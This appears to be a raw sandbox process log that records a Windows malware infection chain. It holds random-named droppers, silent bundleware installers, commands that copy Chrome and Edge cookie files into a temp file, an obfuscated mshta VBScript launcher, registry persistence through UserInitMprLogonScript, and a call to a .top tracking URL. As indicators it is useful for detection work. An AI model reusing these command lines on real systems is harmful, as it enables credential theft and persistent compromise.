C:\Users\Admin\AppData\Roaming\7795918.exe
"C:\Users\Admin\AppData\Roaming\7795918.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 788 -p 3828 -ip 3828
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1556 -s 316
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2188 -s 288
C:\Users\Admin\AppData\Roaming\7159434.exe
"C:\Users\Admin\AppData\Roaming\7159434.exe"
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1100 -s 296
C:\Users\Admin\Documents\GNDvt5g3HxmYCmFACtCcclmN.exe
"C:\Users\Admin\Documents\GNDvt5g3HxmYCmFACtCcclmN.exe"
C:\Users\Admin\AppData\Roaming\1532543.exe
"C:\Users\Admin\AppData\Roaming\1532543.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3828 -s 1628
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" hBS_VbW.EXE&&StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "-p3auHHA5Pn7qj14hc1xRG9TH8FS " =="" for %A In ("C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" ) do taskkill -f -iM "%~NxA"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\Users\Admin\AppData\Roaming\4603920.exe
"C:\Users\Admin\AppData\Roaming\4603920.exe"
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 736 -p 2160 -ip 2160
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2160 -s 280
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" .\QnEJR.fPC,a
C:\Users\Admin\AppData\Local\Temp\is-0FLUP.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-0FLUP.tmp\Setup.exe" /Verysilent
C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe
"C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe"
C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe
"C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe
"C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe
"C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
C:\Users\Admin\AppData\Local\Temp\is-06FJV.tmp\Inlog.tmp
"C:\Users\Admin\AppData\Local\Temp\is-06FJV.tmp\Inlog.tmp" /SL5="$50150,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe
"C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
C:\Users\Admin\AppData\Local\Temp\is-2V679.tmp\WEATHER Manager.tmp
"C:\Users\Admin\AppData\Local\Temp\is-2V679.tmp\WEATHER Manager.tmp" /SL5="$20348,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
C:\Users\Admin\AppData\Local\Temp\is-F482G.tmp\VPN.tmp
"C:\Users\Admin\AppData\Local\Temp\is-F482G.tmp\VPN.tmp" /SL5="$103A6,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe
"C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"
C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe
"C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe
"C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"
C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"
C:\Users\Admin\AppData\Local\Temp\is-V4CEU.tmp\MediaBurner2.tmp
"C:\Users\Admin\AppData\Local\Temp\is-V4CEU.tmp\MediaBurner2.tmp" /SL5="$10450,506086,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe
"C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"
C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe
"C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4256 -ip 4256
C:\Users\Admin\AppData\Local\Temp\is-591GI.tmp\3377047_logo_media.exe
"C:\Users\Admin\AppData\Local\Temp\is-591GI.tmp\3377047_logo_media.exe" /S /UID=burnerch2
C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4256 -s 296
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
C:\Users\Admin\AppData\Roaming\2096115.exe
"C:\Users\Admin\AppData\Roaming\2096115.exe"
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 440 -p 3988 -ip 3988
C:\Users\Admin\AppData\Roaming\2602399.exe
"C:\Users\Admin\AppData\Roaming\2602399.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 688 -p 4244 -ip 4244
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3988 -s 2320
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 744 -p 4244 -ip 4244
C:\Users\Admin\AppData\Roaming\5280855.exe
"C:\Users\Admin\AppData\Roaming\5280855.exe"
C:\Users\Admin\AppData\Roaming\3859156.exe
"C:\Users\Admin\AppData\Roaming\3859156.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4244 -s 808
C:\Users\Admin\AppData\Roaming\4303655.exe
"C:\Users\Admin\AppData\Roaming\4303655.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4244 -s 840
C:\Users\Admin\AppData\Local\Temp\tmpAD77_tmp.exe
"C:\Users\Admin\AppData\Local\Temp\tmpAD77_tmp.exe"
C:\Users\Admin\Documents\K8Hno9wMPq_SEtOmqzSO0cTe.exe
"C:\Users\Admin\Documents\K8Hno9wMPq_SEtOmqzSO0cTe.exe"
C:\Users\Admin\Documents\OuoC3LfzUwkBoMEu2wptPjMS.exe
"C:\Users\Admin\Documents\OuoC3LfzUwkBoMEu2wptPjMS.exe"
C:\Users\Admin\Documents\RCQ7i9ad5QYPzykbDX8g4fqB.exe
"C:\Users\Admin\Documents\RCQ7i9ad5QYPzykbDX8g4fqB.exe"
C:\Users\Admin\Documents\UJS3PWqIQvBq50W9vHzWcJsb.exe
"C:\Users\Admin\Documents\UJS3PWqIQvBq50W9vHzWcJsb.exe"
C:\Users\Admin\Documents\YpVI83jFyaU8LZDrcM65rd0z.exe
"C:\Users\Admin\Documents\YpVI83jFyaU8LZDrcM65rd0z.exe"
C:\Users\Admin\Documents\kK4gV8mj_l4TMZGAbeaA6KTG.exe
"C:\Users\Admin\Documents\kK4gV8mj_l4TMZGAbeaA6KTG.exe"
C:\Users\Admin\Documents\DB_GbXPWmdYLlmz8y4_YoGg2.exe
"C:\Users\Admin\Documents\DB_GbXPWmdYLlmz8y4_YoGg2.exe"
C:\Users\Admin\Documents\9pONIe0nFBxvnWt9ECWAXSgO.exe
"C:\Users\Admin\Documents\9pONIe0nFBxvnWt9ECWAXSgO.exe"
C:\Users\Admin\Documents\KA37Kc2o57YExJFC6rcVJst6.exe
"C:\Users\Admin\Documents\KA37Kc2o57YExJFC6rcVJst6.exe"
C:\Users\Admin\Documents\nQFFs_BuyKAqY1q118qmtfeB.exe
"C:\Users\Admin\Documents\nQFFs_BuyKAqY1q118qmtfeB.exe"
C:\Users\Admin\Documents\RRwfaxdJkHGtUbWpZJYN3aab.exe
"C:\Users\Admin\Documents\RRwfaxdJkHGtUbWpZJYN3aab.exe"
C:\Users\Admin\Documents\fmDyy112R03mFYSeyYsB9QHu.exe
"C:\Users\Admin\Documents\fmDyy112R03mFYSeyYsB9QHu.exe"
C:\Users\Admin\Documents\0zUcjfwwaGb2J80laB3p5zqO.exe
"C:\Users\Admin\Documents\0zUcjfwwaGb2J80laB3p5zqO.exe"
C:\Users\Admin\Documents\ofhPkhzCanPE3KTdiFKyJQNP.exe
"C:\Users\Admin\Documents\ofhPkhzCanPE3KTdiFKyJQNP.exe"
C:\Users\Admin\Documents\qv_FiRjt3InZdzKQeY3qPFTV.exe
"C:\Users\Admin\Documents\qv_FiRjt3InZdzKQeY3qPFTV.exe"
C:\Users\Admin\Documents\vz1K7aas2iNV_zAV8XypoGqZ.exe
"C:\Users\Admin\Documents\vz1K7aas2iNV_zAV8XypoGqZ.exe"
C:\Users\Admin\Documents\RCadZQI60Kq5Bjt5n_s2lFa9.exe
"C:\Users\Admin\Documents\RCadZQI60Kq5Bjt5n_s2lFa9.exe"
C:\Users\Admin\Documents\_6SO3RBEmYXEZvB1JyvN8RH4.exe
"C:\Users\Admin\Documents\_6SO3RBEmYXEZvB1JyvN8RH4.exe"
C:\Users\Admin\Documents\c2GaMRbuGRYHSDZ2uleDbvjt.exe
"C:\Users\Admin\Documents\c2GaMRbuGRYHSDZ2uleDbvjt.exe"
C:\Users\Admin\Documents\Vu8JiHzoy_VQzkYrueDnKkdL.exe
"C:\Users\Admin\Documents\Vu8JiHzoy_VQzkYrueDnKkdL.exe"
C:\Users\Admin\Documents\b1x2wlTQfNKID4U1iI82grKw.exe
"C:\Users\Admin\Documents\b1x2wlTQfNKID4U1iI82grKw.exe"
C:\Users\Admin\Documents\pitI4UNAI_IFp4vEjEj3wL2U.exe
"C:\Users\Admin\Documents\pitI4UNAI_IFp4vEjEj3wL2U.exe"
C:\Users\Admin\Documents\VysNse9aH2S6vEZG4VFDtDI3.exe
"C:\Users\Admin\Documents\VysNse9aH2S6vEZG4VFDtDI3.exe"
C:\Users\Admin\AppData\Local\Temp\is-JH53N.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-JH53N.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=715
C:\Users\Admin\Documents\lzcc5otmRQiivUWGxRQNmSXt.exe
"C:\Users\Admin\Documents\lzcc5otmRQiivUWGxRQNmSXt.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 5824 -ip 5824
C:\Users\Admin\Documents\DjDwTp3p04hx12qdHlbuc4oA.exe
"C:\Users\Admin\Documents\DjDwTp3p04hx12qdHlbuc4oA.exe"
C:\Users\Admin\Documents\07cdwzaTf8d0t7OKE14p6WXx.exe
"C:\Users\Admin\Documents\07cdwzaTf8d0t7OKE14p6WXx.exe"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN("C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\Documents\b1x2wlTQfNKID4U1iI82grKw.exe"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF """" == """" for %A In (""C:\Users\Admin\Documents\b1x2wlTQfNKID4U1iI82grKw.exe"" ) do taskkill -f -iM ""%~NxA"" ",0 , TRUE) )
C:\Users\Admin\AppData\Local\Temp\is-9POT5.tmp\07cdwzaTf8d0t7OKE14p6WXx.tmp
"C:\Users\Admin\AppData\Local\Temp\is-9POT5.tmp\07cdwzaTf8d0t7OKE14p6WXx.tmp" /SL5="$10528,138429,56832,C:\Users\Admin\Documents\07cdwzaTf8d0t7OKE14p6WXx.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5824 -s 1844
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 380 -p 1808 -ip 1808
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 3396 -ip 3396
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\Documents\b1x2wlTQfNKID4U1iI82grKw.exe" hBS_VbW.EXE&&StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "" =="" for %A In ("C:\Users\Admin\Documents\b1x2wlTQfNKID4U1iI82grKw.exe" ) do taskkill -f -iM "%~NxA"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1808 -s 260
C:\Users\Admin\AppData\Local\Temp\839.exe
C:\Users\Admin\AppData\Local\Temp\839.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3396 -s 2436
C:\Users\Admin\Documents\0zUcjfwwaGb2J80laB3p5zqO.exe
C:\Users\Admin\Documents\0zUcjfwwaGb2J80laB3p5zqO.exe
C:\Users\Admin\Documents\KA37Kc2o57YExJFC6rcVJst6.exe
C:\Users\Admin\Documents\KA37Kc2o57YExJFC6rcVJst6.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 760 -p 5044 -ip 5044
C:\Users\Admin\Documents\RRwfaxdJkHGtUbWpZJYN3aab.exe
"C:\Users\Admin\Documents\RRwfaxdJkHGtUbWpZJYN3aab.exe" -q
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5044 -s 276
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 6112 -ip 6112
C:\Windows\SysWOW64\dllhost.exe
"C:\Windows\System32\dllhost.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 748 -p 4172 -ip 4172
C:\Users\Admin\Documents\VysNse9aH2S6vEZG4VFDtDI3.exe
"C:\Users\Admin\Documents\VysNse9aH2S6vEZG4VFDtDI3.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 728 -p 5200 -ip 5200
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 648 -p 5148 -ip 5148
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5148 -s 296
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 6116 -ip 6116
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5200 -s 236
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 6684 -ip 6684
C:\Users\Admin\AppData\Roaming\8408451.exe
"C:\Users\Admin\AppData\Roaming\8408451.exe"
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding E124C864F913A45B40ED9CED7CCC8F8D C
C:\Users\Admin\AppData\Roaming\6541000.exe
"C:\Users\Admin\AppData\Roaming\6541000.exe"
C:\Users\Admin\AppData\Local\Temp\is-M8S8J.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-M8S8J.tmp\Setup.exe" /Verysilent
C:\Users\Admin\AppData\Roaming\2213492.exe
"C:\Users\Admin\AppData\Roaming\2213492.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 804 -p 2596 -ip 2596
C:\Windows\SysWOW64\taskkill.exe
taskkill -f -iM "b1x2wlTQfNKID4U1iI82grKw.exe"
C:\Users\Admin\Documents\c2GaMRbuGRYHSDZ2uleDbvjt.exe
"C:\Users\Admin\Documents\c2GaMRbuGRYHSDZ2uleDbvjt.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6684 -s 292
C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe
"C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"
C:\Users\Admin\AppData\Roaming\5067096.exe
"C:\Users\Admin\AppData\Roaming\5067096.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cmd < Eravate.wks
C:\Users\Admin\AppData\Local\Temp\is-PTJ53.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-PTJ53.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6112 -s 312
C:\Users\Admin\AppData\Local\Temp\is-0FPF0.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-0FPF0.tmp\Setup.tmp" /SL5="$4031E,17361482,721408,C:\Users\Admin\AppData\Local\Temp\is-PTJ53.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629403837 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 744 -p 5336 -ip 5336
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-2T1D4.tmp\{app}\microsoft.cab -F:* %ProgramData%
C:\Windows\SysWOW64\cmd.exe
cmd
C:\Users\Admin\AppData\Local\Temp\is-5CI89.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-5CI89.tmp\Setup.exe" /silent /subid=720
C:\Users\Admin\AppData\Local\Temp\is-MTSN4.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-MTSN4.tmp\Setup.tmp" /SL5="$30526,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-5CI89.tmp\Setup.exe" /silent /subid=720
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5336 -s 276
C:\Windows\SysWOW64\findstr.exe
findstr /V /R "^ULDdlRJfZsbrDapCbeEYycZEgRIWBtYuQhzBPWvHncPJJvLmMbGEuHBnMZeapMOUzsjfZIMBGWAJGfVSyolrbxqpLUPQTrnLHUdspcArKyXpiRSvrlhqBKbYsrEtT$" Una.wks
C:\Users\Admin\AppData\Local\Temp\71B2.exe
C:\Users\Admin\AppData\Local\Temp\71B2.exe
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 0BD1E6B7AF665DF9EAFBD14B895F02CF C
C:\Windows\SysWOW64\PING.EXE
ping YJTUIPJF -n 30
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
Esplorarne.exe.com i
C:\Windows\SysWOW64\expand.exe
expand C:\Users\Admin\AppData\Local\Temp\is-2T1D4.tmp\{app}\microsoft.cab -F:* C:\ProgramData
C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 7372 -ip 7372
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 544 -p 5124 -ip 5124
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7372 -s 456
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 5124 -s 2328
C:\Users\Admin\AppData\Local\Temp\99BD.exe
C:\Users\Admin\AppData\Local\Temp\99BD.exe
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files\Common Files\LKZFYRTWEP\ultramediaburner.exe
"C:\Program Files\Common Files\LKZFYRTWEP\ultramediaburner.exe" /VERYSILENT
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding DDB1B11B61552B5203C275018E564250
C:\Users\Admin\AppData\Local\Temp\f0-9c43e-84f-6af91-17fa8b716bfcb\SHekozhuvaxi.exe
"C:\Users\Admin\AppData\Local\Temp\f0-9c43e-84f-6af91-17fa8b716bfcb\SHekozhuvaxi.exe"
C:\Users\Admin\AppData\Local\Temp\is-269JU.tmp\ultramediaburner.tmp
"C:\Users\Admin\AppData\Local\Temp\is-269JU.tmp\ultramediaburner.tmp" /SL5="$20528,281924,62464,C:\Program Files\Common Files\LKZFYRTWEP\ultramediaburner.exe" /VERYSILENT
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-JH53N.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-JH53N.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629403837 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
C:\Users\Admin\AppData\Local\Temp\0d-d88f0-acf-00085-1b5b7aac6381d\Qaemycovevae.exe
"C:\Users\Admin\AppData\Local\Temp\0d-d88f0-acf-00085-1b5b7aac6381d\Qaemycovevae.exe"
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 3F98F9707B901C52F4920E3772721E12 C
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
tapinstall.exe remove tap0901
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 3228 -ip 3228
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\BE1F.exe
C:\Users\Admin\AppData\Local\Temp\BE1F.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3228 -s 2440
C:\Windows\SysWOW64\reg.exe
reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 548 -p 920 -ip 920
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 920 -s 2296
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c start http://trecker33442aq.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^¶m=721
C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe
"C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"
C:\Users\Admin\AppData\Local\Temp\is-2T1D4.tmp\{app}\vdi_compiler.exe
"C:\Users\Admin\AppData\Local\Temp\is-2T1D4.tmp\{app}\vdi_compiler"
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
tapinstall.exe install OemVista.inf tap0901
C:\Users\Admin\AppData\Local\Temp\E280.exe
C:\Users\Admin\AppData\Local\Temp\E280.exe
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629403837 /qn CAMPAIGN=""710"" " CAMPAIGN="710"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 752 -p 7484 -ip 7484
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7484 -s 2408
C:\Windows\system32\DrvInst.exe
DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{5677b0a2-28e0-2744-9412-ec2c8fbf1c5e}\oemvista.inf" "9" "4d14a44ff" "00000000000000F0" "WinSta0\Default" "0000000000000160" "208" "c:\program files (x86)\maskvpn\driver\win764"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 2116 -ip 2116
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2116 -s 292
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\system32\DrvInst.exe
DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oem2.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "000000000000015C" "f3c7"
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc
C:\Windows\system32\svchost.exe
